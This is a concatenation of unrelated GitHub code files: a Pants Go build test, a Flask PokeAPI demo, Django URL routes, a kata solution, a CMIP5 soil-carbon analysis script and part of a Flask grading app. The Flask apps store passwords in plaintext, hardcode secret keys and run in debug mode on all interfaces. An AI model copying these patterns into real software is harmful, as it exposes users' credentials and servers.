dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.16\n require github.com/google/uuid v1.3.0\n require (\n rsc.io/quote v1.5.2\n golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c // indirect\n rsc.io/sampler v1.3.0 // indirect\n )\n \"\"\"\n ),\n \"foo/go.sum\": dedent(\n \"\"\"\\\n github.com/google/uuid v1.3.0 h1:t6JiXgmwXMjEs8VusXIJk2BXHsn+wx8BZdTaoZ5fu7I=\n github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=\n golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c h1:qgOY6WgZOaTkIIMiVjBQcw93ERBE4m30iBm00nkL0i8=\n golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=\n rsc.io/quote v1.5.2 h1:w5fcysjrx7yqtD/aO+QwRjYZOKnaM9Uh2b40tElTs3Y=\n rsc.io/quote v1.5.2/go.mod h1:LzX7hefJvL54yjefDEDHNONDjII0t9xZLPXsUe+TKr0=\n rsc.io/sampler v1.3.0 h1:7uVkIFmeBqHfdjD+gZwtXXI+RODJ2Wc4O7MPEh/QiW4=\n rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA=\n \"\"\"\n ),\n \"foo/pkg/foo.go\": dedent(\n \"\"\"\\\n package pkg\n import \"github.com/google/uuid\"\n import \"rsc.io/quote\"\n\n func Grok() string {\n return \"Hello World\"\n }\n \"\"\"\n ),\n \"foo/cmd/main.go\": dedent(\n \"\"\"\\\n package main\n import (\n \"fmt\"\n \"go.example.com/foo/pkg\"\n )\n func main() {\n fmt.Printf(\"%s\\n\", pkg.Grok())\n }\n \"\"\"\n ),\n \"foo/cmd/bar_test.go\": dedent(\n \"\"\"\\\n package main\n import \"testing\"\n func TestBar(t *testing.T) {}\n \"\"\"\n ),\n }\n )\n\n def assert_info(\n subpath: str,\n *,\n imports: list[str],\n test_imports: list[str],\n xtest_imports: list[str],\n go_files: list[str],\n test_files: list[str],\n xtest_files: list[str],\n embed_patterns: Iterable[str] = (),\n test_embed_patterns: Iterable[str] = (),\n xtest_embed_patterns: Iterable[str] = (),\n ) -> None:\n maybe_info = rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"foo\", generated_name=f\"./{subpath}\"))],\n )\n assert maybe_info.info is not None\n info = maybe_info.info\n actual_snapshot = rule_runner.request(Snapshot, [info.digest])\n expected_snapshot = rule_runner.request(Snapshot, [PathGlobs([f\"foo/{subpath}/*.go\"])])\n assert actual_snapshot == expected_snapshot\n\n assert info.imports == tuple(imports)\n assert info.test_imports == tuple(test_imports)\n assert info.xtest_imports == tuple(xtest_imports)\n assert info.go_files == tuple(go_files)\n assert info.test_files == tuple(test_files)\n assert info.xtest_files == tuple(xtest_files)\n assert not info.s_files\n\n assert info.minimum_go_version == \"1.16\"\n\n assert info.embed_patterns == tuple(embed_patterns)\n assert info.test_embed_patterns == tuple(test_embed_patterns)\n assert info.xtest_embed_patterns == tuple(xtest_embed_patterns)\n\n assert_info(\n \"pkg\",\n imports=[\"github.com/google/uuid\", \"rsc.io/quote\"],\n test_imports=[],\n xtest_imports=[],\n go_files=[\"foo.go\"],\n test_files=[],\n xtest_files=[],\n )\n assert_info(\n \"cmd\",\n imports=[\"fmt\", \"go.example.com/foo/pkg\"],\n test_imports=[\"testing\"],\n xtest_imports=[],\n go_files=[\"main.go\"],\n test_files=[\"bar_test.go\"],\n xtest_files=[],\n )\n\n\ndef test_invalid_package(rule_runner) -> None:\n rule_runner.write_files(\n {\n \"BUILD\": \"go_mod(name='mod')\\n\",\n \"go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.17\n \"\"\"\n ),\n \"bad.go\": \"invalid!!!\",\n }\n )\n maybe_info = rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"\", target_name=\"mod\", 
generated_name=\"./\"))],\n )\n assert maybe_info.info is None\n assert maybe_info.exit_code == 1\n assert \"bad.go:1:1: expected 'package', found invalid\\n\" in maybe_info.stderr\n\n\n@pytest.mark.xfail(reason=\"cgo is ignored\")\ndef test_cgo_not_supported(rule_runner: RuleRunner) -> None:\n rule_runner.write_files(\n {\n \"BUILD\": \"go_mod(name='mod')\\n\",\n \"go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.17\n \"\"\"\n ),\n \"hello.go\": dedent(\n \"\"\"\\\n package main\n\n // int fortytwo()\n // {\n //\t return 42;\n // }\n import \"C\"\n import \"fmt\"\n\n func main() {\n f := C.intFunc(C.fortytwo)\n fmt.Println(C.intFunc(C.fortytwo))\n }\n \"\"\"\n ),\n }\n )\n with engine_error(NotImplementedError):\n rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"\", target_name=\"mod\", generated_name=\"./\"))],\n )\n\n\ndef test_embeds_supported(rule_runner: RuleRunner) -> None:\n rule_runner.write_files(\n {\n \"BUILD\": \"go_mod(name='mod')\\n\",\n \"go.mod\": dedent(\n \"\"\"\\\n module go.example.com/foo\n go 1.17\n \"\"\"\n ),\n \"grok.txt\": \"This will be embedded in a Go binary.\\n\",\n \"test_grok.txt\": \"This will be embedded in a Go binary.\\n\",\n \"xtest_grok.txt\": \"This will be embedded in a Go binary.\\n\",\n \"foo.go\": dedent(\n \"\"\"\\\n package foo\n import _ \"embed\"\n //go:embed grok.txt\n var message\n \"\"\"\n ),\n \"foo_test.go\": dedent(\n \"\"\"\\\n package foo\n import _ \"embed\"\n //go:embed test_grok.txt\n var testMessage\n \"\"\"\n ),\n \"bar_test.go\": dedent(\n \"\"\"\\\n package foo_test\n import _ \"embed\"\n //go:embed xtest_grok.txt\n var testMessage\n \"\"\"\n ),\n }\n )\n maybe_info = rule_runner.request(\n FallibleFirstPartyPkgInfo,\n [FirstPartyPkgInfoRequest(Address(\"\", target_name=\"mod\", generated_name=\"./\"))],\n )\n assert maybe_info.info is not None\n info = maybe_info.info\n assert info.embed_patterns == (\"grok.txt\",)\n assert info.test_embed_patterns == (\"test_grok.txt\",)\n assert info.xtest_embed_patterns == (\"xtest_grok.txt\",)\n","repo_name":"akk5597/pants","sub_path":"src/python/pants/backend/go/util_rules/first_party_pkg_test.py","file_name":"first_party_pkg_test.py","file_ext":"py","file_size_in_byte":8749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"21196579424","text":"from flask import Flask, render_template\nfrom jinja2 import StrictUndefined\nfrom pprint import pprint\nimport requests, json\n\napp = Flask(__name__)\n\n# Flask Sessions and Debug Toolbar\napp.secret_key = 'omnislash'\napp.jinja_env.undefined = StrictUndefined\n\n# Routes\n@app.route('/')\ndef home():\n return 'work in progress'\n\n# Test calls\n# Pokemon info is accessed by a pokemon's number. 
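The PokeAPI path takes the National Pokedex number (or the lowercase name) as its final segment. 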
Ex: bulbasaur == 1\nurl = 'https://pokeapi.co/api/v2/pokemon/1/'\npokemon_api = requests.get(url)\n\n# Front pokemon sprite image url\npprint(pokemon_api.json()['sprites']['front_default'])\n\n# Pokemon name\npprint(pokemon_api.json()['name'])\n\n\n# Pokemon types (fire, water, grass, etc)\npokemon_types = pokemon_api.json()['types']\nfor types in pokemon_types:\n    pprint(types['type']['name'])\n\n\n\n\n\n###########################\nif __name__ == \"__main__\":\n    app.debug = True\n\n\n    app.run(host=\"0.0.0.0\")","repo_name":"kumsy/pokedex","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"16530986940","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n    url(r\"^sa/schedA$\", views.schedA, name=\"schedA\"),\n    url(\n        r\"^sa/contribution_aggregate$\",\n        views.contribution_aggregate,\n        name=\"contribution_aggregate\",\n    ),\n    url(\n        r\"^sa/force_aggregate_sa$\", views.force_aggregate_sa, name=\"force_aggregate_sa\"\n    ),\n    url(\n        r\"^sa/force_unaggregate_sa$\",\n        views.force_unaggregate_sa,\n        name=\"force_unaggregate_sa\",\n    ),\n    url(\n        r\"^sa/force_itemize_sa$\", views.force_itemize_sa, name=\"force_itemize_sa\"\n    ),\n    url(\n        r\"^sa/force_unitemize_sa$\",\n        views.force_unitemize_sa,\n        name=\"force_unitemize_sa\",\n    ),\n    # This API was brought in from the CORE app because it uses a few sched_A functions that would otherwise conflict\n    url(\n        r\"^core/trash_restore_transactions$\",\n        views.trash_restore_transactions,\n        name=\"trash_restore_transactions\",\n    ),\n    url(\n        r\"^sa/get_report_id_from_date$\",\n        views.get_report_id_from_date,\n        name=\"get_report_id_from_date\",\n    ),\n]\n","repo_name":"albertcrowley/fecfile-web-api","sub_path":"django-backend/fecfiler/sched_A/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"6823581251","text":"#Write a function that will return the count of distinct \n#case-insensitive alphabetic characters and numeric digits \n#that occur more than once in the input string.
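 For example, \"aabBcde\" has two case-insensitive duplicates ('a' and 'b'), so it should return 2.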
\n#The input string can be assumed to contain only alphabets (both uppercase and lowercase) and numeric digits.\n\ndef duplicate_count(text):\n    letters_numbers = {\n        'A':0,'B':0,'C':0,'D':0,'E':0,'F':0,'G':0,'H':0,'I':0,'J':0,'K':0,'L':0,'M':0,'N':0,\n        'O':0,'P':0,'Q':0,'R':0,'S':0,'T':0,'U':0,'V':0,'W':0,'X':0,'Y':0,'Z':0,\n        '0':0,'1':0,'2':0,'3':0,'4':0,'5':0,'6':0,'7':0,'8':0,'9':0\n    }\n    for char in text.upper():\n        letters_numbers[char] += 1\n    count = 0\n    for char in letters_numbers:\n        if letters_numbers[char] >= 2:\n            count +=1\n    return count\n\ndef duplicate_count_2(text):\n    seen = set()\n    duples = set()\n    for char in text:\n        char = char.lower()\n        if char in seen:\n            duples.add(char)\n        seen.add(char)\n    return len(duples)\n\ndef duplicate_count_3(text):\n    duply_count = 0\n    text=text.lower()\n    for i in set(text):\n        if text.count(i) > 1:\n            duply_count += 1\n    return duply_count\n\nprint (duplicate_count('abcde'))\nprint (duplicate_count('aabbcde'))","repo_name":"berg96/CodeWars","sub_path":"Counting Duplicates(CW).py","file_name":"Counting Duplicates(CW).py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"17506534264","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCreated on Thu Feb 6 13:46:43 2020\n@author: Rebecca Varney, University of Exeter (rmv203@exeter.ac.uk)\n\nAnalysis Python Script for Varney et al. 2020 Nature Communications\n- script finds model soil turnover time (tau_s) calculated using model output and then subsequent modelled change in\nsoil carbon (model deltaCs,tau), and relationship-derived change in soil carbon (relationship-derived deltaCs,tau),\nwhich is calculated using the model-specific spatial temperature sensitivities of tau (quadratic fits) and model temperature\n- calculated for CMIP5 models\n- investigating if relationship-derived deltaCs,tau and model deltaCs,tau are similar (on one-to-one line)\nfor each model considered in this study\n- pofp_analysis: change is considered between time averaged historical (1995-2005) and then time averaged at the\nend of a future RCP scenario (2090-2100)\n\"\"\"\n\n#%%\n\n# Analysis imports\nimport numpy as np\nimport numpy.ma as ma\n\n# My functions\nfrom rmv_cmip_analysis import combine_netCDF_cmip5\nfrom rmv_cmip_analysis import open_netCDF\nfrom rmv_cmip_analysis import select_time\nfrom rmv_cmip_analysis import time_average\nfrom rmv_cmip_analysis import numpy_to_cube\nfrom rmv_cmip_analysis import global_total_percentage\n\n\n#%%\n#inputs\n\n# historical / present day dates\nlower_historical = 1995\nupper_historical = 2005\n# future dates\nlower = 2090\nupper = 2100\n\n\n# CMIP5 models\ncmip5_models = ['BNU-ESM', 'CanESM2', 'CESM1-CAM5', 'GFDL-ESM2G', 'GISS-E2-R', 'HadGEM2-ES', 'IPSL-CM5A-LR', 'MIROC-ESM', 'NorESM1-M']\nn_models = len(cmip5_models)\nmodel_shapes = ['o', '^', 'v', '1', 's', '*', 'x', '+', 'd']\n\n# RCP scenarios\nrcp_options = ['rcp26', 'rcp45', 'rcp85']\nrcp_options_length = len(rcp_options)\n\n\n# defining empty numpy array to save values\nx_array = ma.zeros((len(rcp_options), len(cmip5_models)))\ny_array = ma.zeros((len(rcp_options), len(cmip5_models)))\n\n\n#%%\n# Loop through each rcp run being considered\nfor rcp_option in range(0, rcp_options_length):\n    rcp = rcp_options[rcp_option] # selecting the rcp scenario\n\n    # for loop for each CMIP5 model\n    for model_i in range(0, n_models):\n        model = cmip5_models[model_i] # selecting the models\n\n        print(rcp, model)\n\n\n        #%% historical soil turnover time
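\n        # tau_s = Cs / Rh gives turnover time in years; the 86400.*365. factor below converts Rh from a per-second flux (kg C m-2 s-1) to a per-year flux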
\n\n        # Heterotrophic Respiration (RH)\n        rh_historical_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/rh_Lmon_'+model+'_historical*', 'heterotrophic_respiration_carbon_flux', model)\n        rh_historical_cube = open_netCDF(rh_historical_cube)\n        # Soil Carbon (cSoil)\n        cSoil_historical_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/cSoil_Lmon_'+model+'_historical*', 'soil_carbon_content', model)\n        cSoil_historical_cube = open_netCDF(cSoil_historical_cube)\n        # Near Surface Air Temperature (tas)\n        tas_historical_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/tas_Amon_'+model+'_historical*', 'air_temperature', model)\n        tas_historical_cube = open_netCDF(tas_historical_cube)\n\n        # Select historical time period\n        rh_historical_cube = select_time(rh_historical_cube, lower_historical, upper_historical)\n        cSoil_historical_cube = select_time(cSoil_historical_cube, lower_historical, upper_historical)\n        tas_historical_cube = select_time(tas_historical_cube, lower_historical, upper_historical)\n        # Time average\n        rh_historical_cube = time_average(rh_historical_cube)\n        cSoil_historical_cube = time_average(cSoil_historical_cube)\n        tas_historical_cube = time_average(tas_historical_cube)\n        # Converting from cubes to numpy_arrays\n        rh_historical_data = rh_historical_cube.data\n        cSoil_historical_data = cSoil_historical_cube.data\n        tas_historical_data = tas_historical_cube.data\n\n        # save to use later\n        historical_tas_save_data = tas_historical_data - 273.15\n        cSoil_historical_save_cube = cSoil_historical_cube.copy()\n        historical_rh_save_data = rh_historical_data*86400.*365.\n\n\n        # Calculating Soil Turnover Time (tau_s)\n        tau_s_data_historical = cSoil_historical_data / (rh_historical_data*86400.*365.)\n        tau_s_masked_data_historical = ma.masked_where(np.logical_or(tau_s_data_historical < 1, tau_s_data_historical > 1e4), tau_s_data_historical)\n\n\n        #%% finding the spatial relationship\n\n        # masking tas data with corresponding mask\n        tas_historical_data = ma.masked_where(np.logical_or(tau_s_data_historical < 1, tau_s_data_historical > 1e4), tas_historical_data)\n        # changing the x variable air temperature to Celsius from Kelvin\n        xvar_historical = tas_historical_data - 273.15\n\n        # define x and y and flatten\n        x = xvar_historical.flatten()\n        y = tau_s_masked_data_historical.flatten()\n        y = ma.log(y) # numpy masked log of y\n\n        # model-specific quadratic relationship\n        p = np.ma.polyfit(x, y, 2)\n        poly_relationship = np.poly1d(p)\n\n\n        #%% finding estimated Cs\n\n        # historical\n        tau_s_historical_estimated = poly_relationship(historical_tas_save_data)\n\n        # future\n        tas_future_cube = combine_netCDF_cmip5('/home/links/rmv203/cmip5_data/tas_Amon_'+model+'_'+rcp+'_*', 'air_temperature', model)\n        tas_future_cube = open_netCDF(tas_future_cube)\n        # select time\n        tas_future_cube = select_time(tas_future_cube, lower, upper)\n        # time average\n        tas_future_cube = time_average(tas_future_cube)\n        # cube to numpy array\n        tas_future_data = tas_future_cube.data\n        # K to C degrees\n        tas_future_data = tas_future_data - 273.15\n        # estimating future tau_s with polynomial relationship\n        tau_s_future_estimated = poly_relationship(tas_future_data)\n\n        # estimated delta tau_s\n        delta_tau_estimated = ma.exp(tau_s_future_estimated) - ma.exp(tau_s_historical_estimated)\n        # estimated delta soil carbon (relationship-derived deltaCs,tau)\n        delta_c_soil_estimated = delta_tau_estimated*historical_rh_save_data\n\n\n        #%% finding model Cs\n\n        # historical\n        tau_historical_model = 
tau_s_masked_data_historical.copy()\n\n # future\n # Heterotrophic Respiration (RH)\n rh_future_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/rh_Lmon_'+model+'_'+rcp+'*', 'heterotrophic_respiration_carbon_flux', model)\n rh_future_cube = open_netCDF(rh_future_cube)\n # Soil Carbon (cSoil)\n cSoil_future_cube = combine_netCDF_cmip5('/home/rmv203/cmip5_data/cSoil_Lmon_'+model+'_'+rcp+'*', 'soil_carbon_content', model)\n cSoil_future_cube = open_netCDF(cSoil_future_cube)\n # Select future time period\n rh_future_cube = select_time(rh_future_cube, lower, upper)\n cSoil_future_cube = select_time(cSoil_future_cube, lower, upper)\n # Time average\n rh_future_cube = time_average(rh_future_cube)\n cSoil_future_cube = time_average(cSoil_future_cube)\n # Converting from cubes to numpy_arrays\n rh_future_data = rh_future_cube.data\n cSoil_future_data = cSoil_future_cube.data\n # Calculating future soil turnover time\n tau_s_data = cSoil_future_data / (rh_future_data*86400.*365.)\n tau_s_masked_data = ma.masked_where(np.logical_or(tau_s_data < 1, tau_s_data > 1e4), tau_s_data)\n tau_future_model = tau_s_masked_data.copy()\n\n # Modelled delta tau_s\n delta_tau_model = tau_future_model - tau_historical_model\n # calculating delta soil carbon (model deltaCs,tau)\n delta_c_soil_model = delta_tau_model*historical_rh_save_data\n\n\n #%%\n # Calculating the global averaged value of both delta Cs\n\n # Masking invalid values\n delta_c_soil_estimated = np.ma.masked_invalid(delta_c_soil_estimated)\n delta_c_soil_model = np.ma.masked_invalid(delta_c_soil_model)\n # convert numpy array to cube\n delta_c_soil_model_cube = numpy_to_cube(delta_c_soil_model, cSoil_historical_save_cube, 2)\n delta_c_soil_estimated_cube = numpy_to_cube(delta_c_soil_estimated, cSoil_historical_save_cube, 2)\n # landfracs\n landfraction = combine_netCDF_cmip5('/home/rmv203/cmip5_data/sftlf_fx_'+model+'_*', 'land_area_fraction', model)\n # global totals\n model_delta_cSoil_global = global_total_percentage(delta_c_soil_model_cube, landfrac=landfraction, latlon_cons=None)\n model_delta_cSoil_global_data = model_delta_cSoil_global.data\n estimate_delta_cSoil_global = global_total_percentage(delta_c_soil_estimated_cube, landfrac=landfraction, latlon_cons=None)\n estimate_delta_cSoil_global_data = estimate_delta_cSoil_global.data\n\n\n # saving delta Cs values\n x_array[rcp_option, model_i] = estimate_delta_cSoil_global_data\n y_array[rcp_option, model_i] = model_delta_cSoil_global_data\n\n\n #%%\n # saving variables\n np.save('saved_variables/historical_tas_data_'+model+'.npy', historical_tas_save_data.data)\n np.save('saved_variables/historical_tas_mask_'+model+'.npy', historical_tas_save_data.mask)\n np.save('saved_variables/historical_rh_data_'+model+'.npy', historical_rh_save_data.data)\n np.save('saved_variables/historical_rh_mask_'+model+'.npy', historical_rh_save_data.mask)\n np.save('saved_variables/historical_modelled_tau_data_'+model+'.npy', tau_historical_model.data)\n np.save('saved_variables/historical_modelled_tau_mask_'+model+'.npy', tau_historical_model.mask)\n np.save('saved_variables/poly_relationship_'+model+'.npy', poly_relationship)\n\n\n#%%\n# saving data\n \n# looping through each rcp\nfor j in range(0, rcp_options_length):\n rcp = rcp_options[j]\n \n # saving x_array and y_array for each rcp\n np.savetxt(\"saved_data/x_\"+str(rcp)+\"_cmip5.csv\", x_array[j,:], delimiter=\",\")\n np.savetxt(\"saved_data/y_\"+str(rcp)+\"_cmip5.csv\", y_array[j,:], delimiter=\",\")\n \n # saving the r coefficient for x_array and 
y_array for each rcp\n    r_coefficient = ma.corrcoef(x_array[j,:], y_array[j,:])\n    print('CMIP5 r-coefficient:', rcp, r_coefficient)\n    np.savetxt(\"saved_data/cmip5_xy_rcoefficient_\"+str(rcp)+\".csv\", r_coefficient, delimiter=\",\")\n\n    # saving mean delta Cs from CMIP5 models for each rcp\n    mean_delta_Cs_cmip5 = np.nanmean(y_array[j,:])\n    mean_delta_Cs_cmip5 = np.array([mean_delta_Cs_cmip5])\n    print('CMIP5 delta Cs mean:', rcp, mean_delta_Cs_cmip5)\n    np.savetxt(\"saved_data/cmip5_mean_model_deltaCs_\"+str(rcp)+\".csv\", mean_delta_Cs_cmip5, delimiter=\",\")\n\n    # saving std in delta Cs from CMIP5 models for each rcp\n    std_delta_Cs_cmip5 = np.nanstd(y_array[j,:])\n    std_delta_Cs_cmip5 = np.array([std_delta_Cs_cmip5])\n    print('CMIP5 delta Cs std:', rcp, std_delta_Cs_cmip5)\n    np.savetxt(\"saved_data/cmip5_std_model_deltaCs_\"+str(rcp)+\".csv\", std_delta_Cs_cmip5, delimiter=\",\")\n\n\n# saving over all rcp runs\n\n# saving the r coefficient for x_array and y_array\nx_array_flatten = x_array.flatten()\ny_array_flatten = y_array.flatten()\nr_coefficient = ma.corrcoef(x_array_flatten, y_array_flatten)\nprint('CMIP5 all rcps r-coefficient:', r_coefficient)\nnp.savetxt(\"saved_data/cmip5_xy_rcoefficient_allrcps.csv\", r_coefficient, delimiter=\",\")\n\n# saving mean delta Cs from CMIP5 models\nmean_delta_Cs_cmip5 = np.nanmean(y_array)\nmean_delta_Cs_cmip5 = np.array([mean_delta_Cs_cmip5])\nprint('CMIP5 delta Cs mean (all rcps):', mean_delta_Cs_cmip5)\nnp.savetxt(\"saved_data/cmip5_mean_model_deltaCs_allrcps.csv\", mean_delta_Cs_cmip5, delimiter=\",\")\n\n# saving std in delta Cs from CMIP5 models\nstd_delta_Cs_cmip5 = np.nanstd(y_array)\nstd_delta_Cs_cmip5 = np.array([std_delta_Cs_cmip5])\nprint('CMIP5 delta Cs std (all rcps):', std_delta_Cs_cmip5)\nnp.savetxt(\"saved_data/cmip5_std_model_deltaCs_allrcps.csv\", std_delta_Cs_cmip5, delimiter=\",\")\n","repo_name":"rebeccamayvarney/soiltau_ec","sub_path":"pofp_cmip5_analysis.py","file_name":"pofp_cmip5_analysis.py","file_ext":"py","file_size_in_byte":11855,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}
{"seq_id":"39385461036","text":"import flask\nfrom flask import *\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom nlp import Ngrams, common\n\nimport requests\nimport os\nimport sys\n\nfrom datetime import datetime\nimport csv\nimport threading\nimport socket\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\napplication = Flask(__name__)\napplication.config[\"DEBUG\"] = True\napplication.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + \\\n    os.path.join(basedir, \"db.sqlite\")\napplication.secret_key = 'not_so_secret'\n\ndb = SQLAlchemy(application)\n\n# Database #\n\n\nclass User(db.Model):\n    email = db.Column(db.Text(), primary_key=True)\n    username = db.Column(db.Text(), primary_key=True)\n    password = db.Column(db.Text())\n    name = db.Column(db.Text())\n    number = db.Column(db.Integer())\n\n\n# class Test(db.Model):\n#     test_id = db.Column(db.Integer, primary_key=True)\n#     test_name = db.Column(db.Text())\n#     creator = db.Column(db.Text, db.ForeignKey(\"user.username\"))\n\n\n# class Question(db.Model):\n#     question_id = db.Column(db.Integer(), primary_key=True)\n#     # test_id = db.Column(db.Integer, db.ForeignKey(\n#     #     \"test.test_id\"), primary_key=True)\n#     question = db.Column(db.Integer(), primary_key=True)\n#     answer = db.Column(db.Text())\n#     marks = db.Column(db.Float())\n\n\nclass Answer(db.Model):\n    answer_id = db.Column(db.Integer(), primary_key=True)\n
    # test_id = db.Column(db.Integer, db.ForeignKey(\n    #     \"test.test_id\"), primary_key=True)\n    # question_id = db.Column(db.Integer, db.ForeignKey(\n    #     \"question.question_id\"), primary_key=True)\n    student_id = db.Column(db.Integer, db.ForeignKey(\n        \"student.student_id\"))\n    user = db.Column(db.Text, db.ForeignKey(\"user.username\"))\n    model = db.Column(db.Text())\n    answer = db.Column(db.Text())\n    total = db.Column(db.Float())\n    marks = db.Column(db.Float())\n\n\nclass Student(db.Model):\n    student_id = db.Column(db.Integer(), primary_key=True)\n    name = db.Column(db.Text)\n    srn = db.Column(db.Text, unique=True)\n\n# Application #\n\n@application.route(\"/index.html/\")\ndef index():\n    print(\"Inside\")\n    return render_template(\"index.html\")\n\n@application.route(\"/\")\ndef home():\n    return redirect('/login.html/')\n\n\n@application.route('/dashboard.html/', methods=[\"GET\"])\ndef dashboard():\n    return render_template(\"dashboard.html\", user=session[\"username\"])\n\n\n@application.route(\"/login.html/\", methods=[\"GET\", \"POST\"])\ndef login():\n    if(request.method == \"POST\"):\n        username = request.form[\"username\"]\n        password = request.form[\"password\"]\n        user = User.query.filter_by(username=username).first()\n        if(user is None):\n            flash(\"Username not available. Sign up first\", \"danger\")\n        elif(user.password != password):\n            flash(\"Username and password do not match.\", \"danger\")\n        else:\n            session[\"username\"] = user.username\n            return redirect(\"/dashboard.html/\")\n\n    return render_template('login.html')\n\n\n@application.route(\"/signup.html/\", methods=[\"GET\", \"POST\"])\ndef signup():\n\n    if(request.method == \"POST\"):\n        username = request.form[\"username\"]\n        password = request.form[\"password\"]\n        email = request.form[\"email\"]\n        name = request.form[\"name\"]\n        number = request.form[\"number\"]\n\n        test = email.endswith(\"@gmail.com\") and len(\n            number) == 10 and number.isdigit()\n        if(not test):\n            flash(\"Wrong input format\", \"danger\")\n            # bail out here instead of falling through and creating the user anyway\n            return render_template(\"signup.html\")\n\n        user1 = User.query.filter_by(email=email).first()\n        user2 = User.query.filter_by(username=username).first()\n\n        if(user1 is None and user2 is None):\n            user = User(email=email, username=username,\n                        password=password, name=name, number=number)\n            db.session.add(user)\n            db.session.commit()\n            flash(\"User created successfully. Login to start evaluating\", \"success\")\n            return redirect(\"/login.html/\")
        else:\n            flash(\"Username or email already present.\", \"danger\")\n            return render_template(\"signup.html\")\n\n    else:\n        return render_template(\"signup.html\")\n\n\n@application.route('/test.html/')\ndef test():\n    return render_template(\"test.html\", user=session[\"username\"])\n\n\n@application.route('/view_answers.html/', methods=[\"GET\"])\ndef view_answer():\n    srn = request.args.get('srn')\n    session[\"srn\"] = srn\n    return render_template(\"view_answers.html\", user=session[\"username\"], srn=srn)\n\n\n@application.route('/get_answers/', methods=[\"GET\"])\ndef get_answer():\n    srn = session[\"srn\"]\n    count = int(request.args.get('count'))\n    student_id = Student.query.filter_by(srn=srn).first().student_id\n    answers = Answer.query.filter_by(student_id=student_id).all()\n    data = []\n    for answer in answers:\n        data.append([answer.model, answer.answer, answer.total,\n                     answer.marks, answer.answer_id])\n    return jsonify(data[2*count:2*count+2])\n\n\n# the route must capture <int:id>, otherwise Flask cannot pass `id` to this view\n@application.route('/update_marks/<int:id>/', methods=[\"POST\"])\ndef update_marks(id):\n    marks = float(request.form[\"marks\"])\n    answer = Answer.query.filter_by(answer_id=id).first()\n    answer.marks = min(answer.total, marks)\n    db.session.commit()\n    return redirect(url_for(\"view_answer\", srn=session[\"srn\"]))\n\n\n@application.route('/evaluate.html/')\ndef eval():\n    students = Student.query.all()\n    data = []\n    for student in students:\n        s_id = student.student_id\n        name = student.name\n        srn = student.srn\n        answers = Answer.query.filter_by(student_id=s_id).all()\n        total_marks = 0\n        marks_scored = 0\n        count = 0\n        for answer in answers:\n            if(answer.user == session[\"username\"]):\n                total_marks += answer.total\n                marks_scored += answer.marks\n                count += 1\n        if(count):\n            data.append([name, srn, len(answers), marks_scored, total_marks])\n\n    return render_template(\"evaluate.html\", user=session[\"username\"], data=data)\n\n\n@application.route('/result.html/')\ndef result():\n    return render_template(\"result.html\", user=session[\"username\"])\n\n\n@application.route('/get_students', methods=[\"GET\"])\ndef get_students():\n    term = request.args.get('term').lower()\n    students = Student.query.all()\n    data = []\n    for student in students:\n        s_id = student.student_id\n        name = student.name\n        srn = student.srn\n        if(name.lower().startswith(term)):\n            answers = Answer.query.filter_by(student_id=s_id).all()\n            total_marks = 0\n            marks_scored = 0\n            count = 0\n            for answer in answers:\n                if(answer.user == session[\"username\"]):\n                    total_marks += answer.total\n                    marks_scored += answer.marks\n                    count += 1\n            if(count):\n                data.append([name, srn, marks_scored, total_marks])\n\n    return jsonify(data), 200\n\n\n@application.route('/get_results', methods=[\"GET\"])\ndef get_result():\n    count = int(request.args.get('count'))\n    students = Student.query.all()\n    data = []\n    for student in students:\n        s_id = student.student_id\n        name = student.name\n        srn = student.srn\n        answers = Answer.query.filter_by(student_id=s_id).all()\n        total_marks = 0\n        marks_scored = 0\n        answer_count = 0\n        for answer in answers:\n            if(answer.user == session[\"username\"]):\n                total_marks += answer.total\n                marks_scored += answer.marks\n                answer_count += 1\n        if(answer_count):\n            data.append([name, srn, marks_scored, total_marks])\n\n    return jsonify(data[2*count: 2*count+2]), 200\n\n\n@application.route('/add.html/', methods=[\"GET\", \"POST\"])\ndef add():\n    if(request.method == \"POST\"):\n        name = request.form[\"name\"]\n
